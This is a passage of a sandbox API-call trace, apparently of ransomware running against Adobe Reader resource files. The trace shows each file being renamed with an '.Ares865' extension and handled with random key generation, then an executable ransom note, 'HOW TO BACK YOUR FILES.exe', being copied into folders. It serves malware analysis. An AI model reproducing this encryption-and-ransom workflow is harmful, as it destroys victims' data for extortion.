returned="DisplayLanguageNames.sv.txt" [0160.499] lstrlenW (lpString="DisplayLanguageNames.sv.txt") returned 27 [0160.499] lstrlenW (lpString="Ares865") returned 7 [0160.499] lstrcmpiW (lpString1=".sv.txt", lpString2="Ares865") returned -1 [0160.499] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv.txt.Ares865") returned 112 [0160.500] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv.txt.ares865"), dwFlags=0x1) returned 1 [0160.502] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.502] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29020) returned 1 [0160.503] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.504] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.504] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.508] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.509] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.509] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.510] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.sv_FI.txt" | out: lpString1="DisplayLanguageNames.sv_FI.txt") returned="DisplayLanguageNames.sv_FI.txt" [0160.510] lstrlenW (lpString="DisplayLanguageNames.sv_FI.txt") returned 30 [0160.510] lstrlenW (lpString="Ares865") returned 7 [0160.510] lstrcmpiW (lpString1="_FI.txt", lpString2="Ares865") returned -1 [0160.510] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_FI.txt.Ares865") returned 115 [0160.510] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_FI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_fi.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_FI.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_fi.txt.ares865"), dwFlags=0x1) returned 1 [0160.512] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_FI.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_fi.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.512] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28996) returned 1 [0160.512] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.513] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.513] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.517] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.517] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.517] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.528] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.sv_SE.txt" | out: lpString1="DisplayLanguageNames.sv_SE.txt") returned="DisplayLanguageNames.sv_SE.txt" [0160.529] lstrlenW (lpString="DisplayLanguageNames.sv_SE.txt") returned 30 [0160.529] lstrlenW (lpString="Ares865") returned 7 [0160.529] lstrcmpiW (lpString1="_SE.txt", lpString2="Ares865") returned -1 [0160.529] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_SE.txt.Ares865") returned 115 [0160.529] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_SE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_se.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_SE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_se.txt.ares865"), dwFlags=0x1) returned 1 [0160.531] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_SE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_se.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.531] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29020) returned 1 [0160.531] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.532] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.532] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.537] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.537] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.537] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.538] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.tr.txt" | out: lpString1="DisplayLanguageNames.tr.txt") returned="DisplayLanguageNames.tr.txt" [0160.538] lstrlenW (lpString="DisplayLanguageNames.tr.txt") returned 27 [0160.538] lstrlenW (lpString="Ares865") returned 7 [0160.538] lstrcmpiW (lpString1=".tr.txt", lpString2="Ares865") returned -1 [0160.539] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr.txt.Ares865") returned 112 [0160.539] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr.txt.ares865"), dwFlags=0x1) returned 1 [0160.540] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.541] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29320) returned 1 [0160.541] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.542] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.542] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.547] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.547] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.547] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.548] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.tr_TR.txt" | out: lpString1="DisplayLanguageNames.tr_TR.txt") returned="DisplayLanguageNames.tr_TR.txt" [0160.548] lstrlenW (lpString="DisplayLanguageNames.tr_TR.txt") returned 30 [0160.548] lstrlenW (lpString="Ares865") returned 7 [0160.548] lstrcmpiW (lpString1="_TR.txt", lpString2="Ares865") returned -1 [0160.548] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr_TR.txt.Ares865") returned 115 [0160.549] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr_TR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr_tr.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr_TR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr_tr.txt.ares865"), dwFlags=0x1) returned 1 [0160.550] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr_TR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr_tr.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.551] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29320) returned 1 [0160.551] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.552] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.552] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.556] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.556] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.556] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.557] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.uk.txt" | out: lpString1="DisplayLanguageNames.uk.txt") returned="DisplayLanguageNames.uk.txt" [0160.557] lstrlenW (lpString="DisplayLanguageNames.uk.txt") returned 27 [0160.557] lstrlenW (lpString="Ares865") returned 7 [0160.557] lstrcmpiW (lpString1=".uk.txt", lpString2="Ares865") returned -1 [0160.557] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk.txt.Ares865") returned 112 [0160.558] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk.txt.ares865"), dwFlags=0x1) returned 1 [0160.559] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.560] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29262) returned 1 [0160.560] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.561] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.561] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.564] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.565] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.566] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.uk_UA.txt" | out: lpString1="DisplayLanguageNames.uk_UA.txt") returned="DisplayLanguageNames.uk_UA.txt" [0160.566] lstrlenW (lpString="DisplayLanguageNames.uk_UA.txt") returned 30 [0160.566] lstrlenW (lpString="Ares865") returned 7 [0160.566] lstrcmpiW (lpString1="_UA.txt", lpString2="Ares865") returned -1 [0160.566] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk_UA.txt.Ares865") returned 115 [0160.566] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk_UA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk_ua.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk_UA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk_ua.txt.ares865"), dwFlags=0x1) returned 1 [0160.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk_UA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk_ua.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.570] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29262) returned 1 [0160.571] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.571] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.571] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.575] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.576] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.576] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.576] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.zh_CN.txt" | out: lpString1="DisplayLanguageNames.zh_CN.txt") returned="DisplayLanguageNames.zh_CN.txt" [0160.577] lstrlenW (lpString="DisplayLanguageNames.zh_CN.txt") returned 30 [0160.577] lstrlenW (lpString="Ares865") returned 7 [0160.577] lstrcmpiW (lpString1="_CN.txt", lpString2="Ares865") returned -1 [0160.577] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_CN.txt.Ares865") returned 115 [0160.577] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_CN.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_cn.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_CN.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_cn.txt.ares865"), dwFlags=0x1) returned 1 [0160.579] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_CN.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_cn.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.579] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24680) returned 1 [0160.579] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.580] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.580] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.584] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.585] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.585] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.586] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.zh_TW.txt" | out: lpString1="DisplayLanguageNames.zh_TW.txt") returned="DisplayLanguageNames.zh_TW.txt" [0160.586] lstrlenW (lpString="DisplayLanguageNames.zh_TW.txt") returned 30 [0160.586] lstrlenW (lpString="Ares865") returned 7 [0160.586] lstrcmpiW (lpString1="_TW.txt", lpString2="Ares865") returned -1 [0160.586] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt.Ares865") returned 115 [0160.586] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw.txt.ares865"), dwFlags=0x1) returned 1 [0160.588] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24666) returned 1 [0160.589] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.589] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.589] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.593] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.594] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.594] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.595] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.zh_TW_STROKE.txt" | out: lpString1="DisplayLanguageNames.zh_TW_STROKE.txt") returned="DisplayLanguageNames.zh_TW_STROKE.txt" [0160.595] lstrlenW (lpString="DisplayLanguageNames.zh_TW_STROKE.txt") returned 37 [0160.595] lstrlenW (lpString="Ares865") returned 7 [0160.595] lstrcmpiW (lpString1="OKE.txt", lpString2="Ares865") returned 1 [0160.595] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt.Ares865") returned 122 [0160.595] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw_stroke.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw_stroke.txt.ares865"), dwFlags=0x1) returned 1 [0160.597] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw_stroke.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.597] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24716) returned 1 [0160.598] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.598] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.598] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.603] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.604] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.604] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.605] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font" [0160.605] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font" [0160.605] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0160.605] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\how to back your files.exe"), bFailIfExists=1) returned 0 [0160.606] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0160.607] GetLastError () returned 0x0 [0160.608] lstrcatW (in: 